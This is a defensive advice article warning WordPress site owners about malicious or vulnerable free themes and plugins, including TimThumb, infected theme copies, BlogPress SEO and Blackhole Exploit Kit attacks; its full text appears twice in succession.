6 Hack Warnings You Should Know About Free WordPress Themes and Plugins
6 Hack Warnings You Should Know About Free WordPress Themes and Plugins
Although part of the appeal of WordPress is its easy accommodation of expanding themes and plugins, these features can also be sources of woe as well as productivity. One common and easily-distributed method of hacking blogs utilizes WordPress themes that are intentionally designed to take advantage of vulnerabilities, while even some legitimate themes have been known to contain vulnerabilities when installed without any security-enhancing modifications. Although you’re particularly likely to come into contact with malicious themes while searching for no-charge or otherwise free WordPress themes, exploitable WordPress themes can come through many vectors, and we encourage you to take the time to research any given WordPress theme’s history thoroughly before you add it to your blog site.
1. The TimThumb Problem: When Resized Pictures Lead to Bad Code
TimThumb, AKA timthumb.php, is a natural component of many WordPress themes, as a legitimate inclusion that helps to resize images for proper display. Unfortunately, since August of 2011, TimThumb has been discovered to play host to a significant exploit that allows hackers to upload and launch PHP code through the hacked website. Such attacks can be responsible for browser redirects, drive-by-downloads and other browser-based security issues for your site’s visitors.
This example, while not a theme by itself, is often found in various themes, and has gained some notoriety for being the means by which hackers gained access to the site of TimThumb’s own developer. Because other PC security experts have judged TimThumb to be ‘inherently insecure’ based on its file-writing technique, we can only advise you to delete TimThumb from any theme that you use on your WordPress site. However, there are various modifications available to reduce, if not eliminate, some of TimThumb’s security flaws if you really insist on using this theme component.
2. When a Good Theme Goes Bad
There have also been noticeable instances of normally-safe WordPress themes being infected by viruses that automatically travel from one theme to any other accessible ones (such as themes that share the same account or website). Although many theme viruses are somewhat limited in terms of payload and aren’t able to deliver serious attacks, they can still compromise your theme’s security and easily infect related themes without displaying symptoms. Such infected themes should be disinfected by either appropriate anti-malware software or, if necessary, manually deleting the relevant code if your anti-malware scanners can’t recognize the virus in question.
3. From Theme Theft to Malicious Software
As a twist on the aforementioned virus-laden theme attack, we have also found scenarios where intentionally-infected themes are distributed with other types of hostile software. In most cases, these themes are reputable ones that are copied from other sources (never let it be said that malware distributors aren’t lazy!) and then uploaded to general software or WordPress theme websites like top-themes.com. One 2010-dated example of this attack is Chip Bennett’s ‘Oenology’ theme, which was altered without his consent and then uploaded to a separate site. This method of installation can support the installation of many different types of PC threats. Hackers will use your hacked WordPress themes to peddle PC threats such as rogue anti-spyware programs. Rogue anti-spyware programs like Windows PC Aid and Live Security Platinum are designed to lure gullible computer users into purchasing its bogus, licensed version.
Whenever possible, you should download a theme from its original location, such as the developer’s website, and avoid downloading themes from sites that have suspicious histories. Many free theme sites aren’t noted for distributing PC threats deliberately but can still inadvertently host malicious themes that are altered and uploaded by criminals.
4. Bad Plugins with Fake Traffic for Minimal Effort
One common scam is a WordPress theme that offers great search engine-ranking and other traffic-related benefits as soon as you enable theme on your site. Themes that make such claims (like BlogPress SEO) utilize poor linking and search engine optimization practices that are frowned upon by legitimate search engines like Google. In fact, using such a theme not only fails to help your website’s traffic (since the relevant search engine companies are constantly searching for such exploits and setting them to be ignored in search results), but it may even get your entire site banned from Google, Bing or Yahoo Search results. With that kind of potential exile from the web as punishment, we strongly encourage you to use safe and industry-approved methods of boosting your blog’s traffic.
5. The Other Attacks That Malicious Themes Can Slip In to Target You Directly
Although the primary consequences of a bad WordPress theme are towards your visitors and your own website, attacks with other targets in mind have also been known to be included in malicious WordPress themes. For instance, the earlier-mentioned BlogPress SEO was caught transmitting the e-mail addresses of its users to the theme’s author – without, of course, their permission or even notification of the activity. This is one of many easy ways for online criminals to gain access to e-mail accounts to target with spam e-mail and other attacks.
6. Why Updating Your Themes Isn’t Something to Put Off
No one likes to update their software constantly, but outdated (and especially free) versions of WordPress themes are in noticeably greater danger of being compromised than updated ones. PC security companies have even noticed such vulnerabilities being used to launch BlackHole Exploit Kit-based attacks. BEK attacks are configurable to take advantage of a variety of vulnerabilities, as well as install a large assortment of malicious software, including spyware, banking trojans and worms like WORM_CRIDEX.IC.
Although part of the appeal of WordPress is its easy accommodation of expanding themes and plugins, these features can also be sources of woe as well as productivity. One common and easily-distributed method of hacking blogs utilizes WordPress themes that are intentionally designed to take advantage of vulnerabilities, while even some legitimate themes have been known to contain vulnerabilities when installed without any security-enhancing modifications. Although you’re particularly likely to come into contact with malicious themes while searching for no-charge or otherwise free WordPress themes, exploitable WordPress themes can come through many vectors, and we encourage you to take the time to research any given WordPress theme’s history thoroughly before you add it to your blog site.
1. The TimThumb Problem: When Resized Pictures Lead to Bad Code
TimThumb, AKA timthumb.php, is a natural component of many WordPress themes, as a legitimate inclusion that helps to resize images for proper display. Unfortunately, since August of 2011, TimThumb has been discovered to play host to a significant exploit that allows hackers to upload and launch PHP code through the hacked website. Such attacks can be responsible for browser redirects, drive-by-downloads and other browser-based security issues for your site’s visitors.
This example, while not a theme by itself, is often found in various themes, and has gained some notoriety for being the means by which hackers gained access to the site of TimThumb’s own developer. Because other PC security experts have judged TimThumb to be ‘inherently insecure’ based on its file-writing technique, we can only advise you to delete TimThumb from any theme that you use on your WordPress site. However, there are various modifications available to reduce, if not eliminate, some of TimThumb’s security flaws if you really insist on using this theme component.
2. When a Good Theme Goes Bad
There have also been noticeable instances of normally-safe WordPress themes being infected by viruses that automatically travel from one theme to any other accessible ones (such as themes that share the same account or website). Although many theme viruses are somewhat limited in terms of payload and aren’t able to deliver serious attacks, they can still compromise your theme’s security and easily infect related themes without displaying symptoms. Such infected themes should be disinfected by either appropriate anti-malware software or, if necessary, manually deleting the relevant code if your anti-malware scanners can’t recognize the virus in question.
3. From Theme Theft to Malicious Software
As a twist on the aforementioned virus-laden theme attack, we have also found scenarios where intentionally-infected themes are distributed with other types of hostile software. In most cases, these themes are reputable ones that are copied from other sources (never let it be said that malware distributors aren’t lazy!) and then uploaded to general software or WordPress theme websites like top-themes.com. One 2010-dated example of this attack is Chip Bennett’s ‘Oenology’ theme, which was altered without his consent and then uploaded to a separate site. This method of installation can support the installation of many different types of PC threats. Hackers will use your hacked WordPress themes to peddle PC threats such as rogue anti-spyware programs. Rogue anti-spyware programs like Windows PC Aid and Live Security Platinum are designed to lure gullible computer users into purchasing its bogus, licensed version.
Whenever possible, you should download a theme from its original location, such as the developer’s website, and avoid downloading themes from sites that have suspicious histories. Many free theme sites aren’t noted for distributing PC threats deliberately but can still inadvertently host malicious themes that are altered and uploaded by criminals.
4. Bad Plugins with Fake Traffic for Minimal Effort
One common scam is a WordPress theme that offers great search engine-ranking and other traffic-related benefits as soon as you enable theme on your site. Themes that make such claims (like BlogPress SEO) utilize poor linking and search engine optimization practices that are frowned upon by legitimate search engines like Google. In fact, using such a theme not only fails to help your website’s traffic (since the relevant search engine companies are constantly searching for such exploits and setting them to be ignored in search results), but it may even get your entire site banned from Google, Bing or Yahoo Search results. With that kind of potential exile from the web as punishment, we strongly encourage you to use safe and industry-approved methods of boosting your blog’s traffic.
5. The Other Attacks That Malicious Themes Can Slip In to Target You Directly
Although the primary consequences of a bad WordPress theme are towards your visitors and your own website, attacks with other targets in mind have also been known to be included in malicious WordPress themes. For instance, the earlier-mentioned BlogPress SEO was caught transmitting the e-mail addresses of its users to the theme’s author – without, of course, their permission or even notification of the activity. This is one of many easy ways for online criminals to gain access to e-mail accounts to target with spam e-mail and other attacks.
6. Why Updating Your Themes Isn’t Something to Put Off
No one likes to update their software constantly, but outdated (and especially free) versions of WordPress themes are in noticeably greater danger of being compromised than updated ones. PC security companies have even noticed such vulnerabilities being used to launch BlackHole Exploit Kit-based attacks. BEK attacks are configurable to take advantage of a variety of vulnerabilities, as well as install a large assortment of malicious software, including spyware, banking trojans and worms like WORM_CRIDEX.IC.
Join the conversation